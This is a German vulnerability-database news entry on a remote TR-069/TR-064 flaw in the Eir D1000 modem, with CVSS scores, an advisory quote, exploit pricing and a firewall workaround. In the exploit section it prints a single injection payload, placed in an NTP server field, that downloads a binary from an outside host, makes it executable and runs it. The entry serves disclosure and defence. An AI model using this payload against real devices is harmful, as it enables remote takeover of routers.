📚 Eir D1000 Modem TR-069 erweiterte Rechte
💡 Newskategorie: Sicherheitslücken
🔗 Quelle: vuldb.com
Eine sehr kritische Schwachstelle wurde in Eir D1000 Modem entdeckt. Dies betrifft eine unbekannte Funktion der Komponente TR-069. Durch das Beeinflussen mit einer unbekannten Eingabe kann eine erweiterte Rechte-Schwachstelle ausgenutzt werden. Das hat Auswirkungen auf Vertraulichkeit, Integrität und Verfügbarkeit.
Die Schwachstelle wurde am 07.11.2016 durch kenzo2017 als Eir’s D1000 Modem Is Wide Open To Being Hacked. in Form eines bestätigten Advisories (Website) veröffentlicht. Auf devicereversing.wordpress.com kann das Advisory eingesehen werden. Die Herausgabe geschah hierbei ohne Zusammenarbeit mit dem Hersteller. Die Schwachstelle ist relativ beliebt, was mitunter auf ihre geringe Komplexität zurückzuführen ist. Der Angriff kann über das Netzwerk passieren. Das Ausnutzen erfordert keine spezifische Authentisierung. Es sind zwar keine technische Details, jedoch ein öffentlicher Exploit zur Schwachstelle bekannt. Es muss davon ausgegangen werden, dass ein Exploit zur Zeit etwa USD $0-$5k kostet. Das Advisory weist darauf hin:
What is not very well known is that the server on port 7457 is also a TR-064 server. This is another protocol related to TR-069. It is also known as “LAN-Side CPE Configuration”. The idea behind this protocol is to allow the ISP to configure the modem from installation software supplied with the modem. The protocol is not supposed to be accessed from the WAN side of the modem but in the D1000 modem, we can send TR-064 commands to port 7547 on the WAN side. This allows us to “configure” the modem from the Internet.
Ein öffentlicher Exploit wurde in Python umgesetzt und sofort nach dem Advisory veröffentlicht. Er wird als hoch funktional gehandelt. Der Exploit wird unter devicereversing.wordpress.com zur Verfügung gestellt. Als 0-Day erzielte der Exploit wohl etwa $25k-$100k auf dem Schwarzmarkt. Der durch den Exploit genutzte Code gestaltet sich wie folgt:
<NewNTPServer1> `cd /tmp;wget http://tr069.pw/1;chmod 777 1;./1` </NewNTPServer1>
Die Schwachstelle kann durch das Filtern von tcp/7547 (tr-069) mittels Firewalling mitigiert werden.
Ein Bericht in deutscher Sprache wird mitunter durch Heise bereitgestellt.
Betroffen
- Telekom Speedport Modem
CVSSv3
Base Score: 9.8 [?]Temp Score: 9.6 [?]
Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:H/RL:W/RC:C [?]
Zuverlässigkeit: High
CVSSv2
Base Score: 10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C) [?]Temp Score: 9.5 (CVSS2#E:H/RL:W/RC:C) [?]
Zuverlässigkeit: High
CPE
Exploiting
Klasse: Erweiterte RechteLokal: Nein
Remote: Ja
Verfügbarkeit: Ja
Zugang: öffentlich
Status: Hoch funktional
Programmiersprache: Python
Download: devicereversing.wordpress.com
Aktuelle Preisschätzung: $0-$5k (0-day) / $0-$5k (Heute)
Gegenmassnahmen
Empfehlung: FirewallStatus: Workaround
0-Day Time: 0 Tage seit gefunden
Exploit Delay Time: 0 Tage seit bekannt
Firewalling: tcp/7547 (tr-069)
Timeline
07.11.2016 Advisory veröffentlicht07.11.2016 Exploit veröffentlicht
30.11.2016 VulDB Eintrag erstellt
30.11.2016 VulDB letzte Aktualisierung
Quellen
Advisory: Eir’s D1000 Modem Is Wide Open To Being Hacked.Person: kenzo2017
Status: Bestätigt
Heise: 3507134
Eintrag
Erstellt: 30.11.2016Eintrag: 73.8% komplett
...